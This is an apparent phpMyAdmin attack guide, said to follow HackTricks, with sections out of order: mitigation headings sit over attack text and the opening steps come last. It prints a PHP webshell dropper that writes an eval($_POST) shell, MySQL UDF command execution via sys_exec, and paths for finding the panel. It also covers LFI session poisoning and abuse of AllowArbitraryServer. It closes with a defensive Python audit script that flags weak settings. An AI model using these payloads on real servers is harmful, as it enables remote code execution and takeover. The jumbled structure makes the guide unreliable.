[Authenticated phpMyAdmin Session]
        │
        ▼
Does 'secure_file_priv' allow writes?
        │
        ├───► YES ───► Use 'INTO OUTFILE' ───► [Web Shell / RCE]
        │
        └───► NO ────► Exploit LFI/RCE CVEs ───► [Session Poisoning / RCE]
If $cfg['AllowArbitraryServer'] = true is set in config.inc.php, an attacker can host a malicious MySQL server externally, enter its host IP in the phpMyAdmin login prompt, and authenticate against their own infrastructure to reach the internal panel functionality.
Knowing these paths can be useful for session hijacking or local file inclusion attacks.
If INTO OUTFILE is disabled and logging methods fail, writing a webshell into a database’s .frm or MYD file and including it via LFI is a viable fallback. Create a table with a webshell as a field value:
SELECT '<?php fputs(fopen("a.php","w"),"<?php eval($_POST[a]);?>"); ?>';
A flaw allows an attacker to delete a configured server from the user's phpMyAdmin panel by tricking an authenticated administrator into clicking a malicious link. While not directly RCE, it can disrupt operations or be chained with other attacks.

4. Hardening and Mitigation Strategy
If the database user has the FILE privilege and the attacker can deduce or guess the absolute path of the web root directory (e.g., /var/www/html/), they can write a PHP web shell directly to the server.
-- Example UDF creation (Linux)
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so';
SELECT sys_exec('id > /tmp/output.txt');
This guide follows the HackTricks methodology for auditing and exploiting phpMyAdmin, a common web-based MySQL administration tool.

1. Initial Access & Authentication
If phpMyAdmin is not in the root directory, look for it with automated directory brute-forcing tools (such as Gobuster or Dirsearch) using the following common paths:
/phpmyadmin/
/pma/
/admin/phpMyAdmin/
/mysql/
/db/

2. Authentication Bypass and Credential Hunting
Common paths include /phpmyadmin, /pma, /mysql, or /db.
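The hardening side of the two conditions discussed above (AllowArbitraryServer in config.inc.php, and the FILE privilege combined with an unrestricted secure_file_priv that makes INTO OUTFILE writes possible) can be checked from the defender's position. The following audit script is an added example, not code from HackTricks or the phpMyAdmin project; the config fragment, variable values and grant strings it inspects are constructed samples standing in for the output of SHOW VARIABLES and SHOW GRANTS.

```python
import re

# Constructed sample inputs (not taken from any real host): a fragment of
# config.inc.php plus the results a DBA would get from
# SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS FOR the pma account.
SAMPLE_CONFIG = """<?php
$cfg['blowfish_secret'] = 'changeme';
$cfg['AllowArbitraryServer'] = true;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
"""
SAMPLE_VARIABLES = {"secure_file_priv": ""}
SAMPLE_GRANTS = ["GRANT SELECT, INSERT, FILE ON *.* TO `pma`@`localhost`"]

# Matches the weak setting regardless of spacing or case of 'true'.
ARBITRARY_RE = re.compile(r"\$cfg\['AllowArbitraryServer'\]\s*=\s*true\s*;", re.I)


def audit_config(config_text: str) -> list[str]:
    """Flag AllowArbitraryServer = true: it lets a login target any MySQL host."""
    findings = []
    if ARBITRARY_RE.search(config_text):
        findings.append("AllowArbitraryServer is enabled; set it to false")
    return findings


def audit_file_writes(variables: dict, grants: list[str]) -> list[str]:
    """Flag the combination that makes INTO OUTFILE usable for writing files.

    secure_file_priv semantics: '' allows writes anywhere the mysqld process
    can write, None (NULL) disables them, a path restricts them to that directory.
    """
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append("secure_file_priv is empty; INTO OUTFILE can write anywhere")
    # ALL PRIVILEGES implies FILE, so treat it the same way.
    has_file = any(re.search(r"\bFILE\b", g) or "ALL PRIVILEGES" in g for g in grants)
    if has_file:
        findings.append("account holds the FILE privilege; revoke it unless required")
    if sfp == "" and has_file:
        findings.append("FILE privilege plus unrestricted secure_file_priv: file write is possible")
    return findings


if __name__ == "__main__":
    for line in audit_config(SAMPLE_CONFIG) + audit_file_writes(SAMPLE_VARIABLES, SAMPLE_GRANTS):
        print("FINDING:", line)
```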